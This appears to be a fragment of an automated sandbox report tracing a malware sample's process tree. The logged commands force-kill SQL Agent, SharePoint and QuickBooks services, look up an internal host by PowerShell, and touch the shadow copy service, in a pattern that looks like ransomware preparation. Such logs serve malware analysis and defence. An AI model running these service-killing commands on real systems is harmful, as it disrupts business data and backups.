C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM SQLAgent$SBSMONITORING*3⤵PID:904
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM SQLAgent$SHAREPOINT*2⤵PID:2728
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM SQLAgent$SHAREPOINT*3⤵
- Kills process with taskkill
PID:2128
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM QBFCService*2⤵PID:2460
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM QBFCService*3⤵PID:404
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM QBVSS*2⤵PID:3704
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM QBVSS*3⤵
- Kills process with taskkill
PID:492
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell [System.Net.Dns]::GetHostByAddress('10.10.0.27').hostname2⤵PID:1788
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
- Modifies service
PID:3312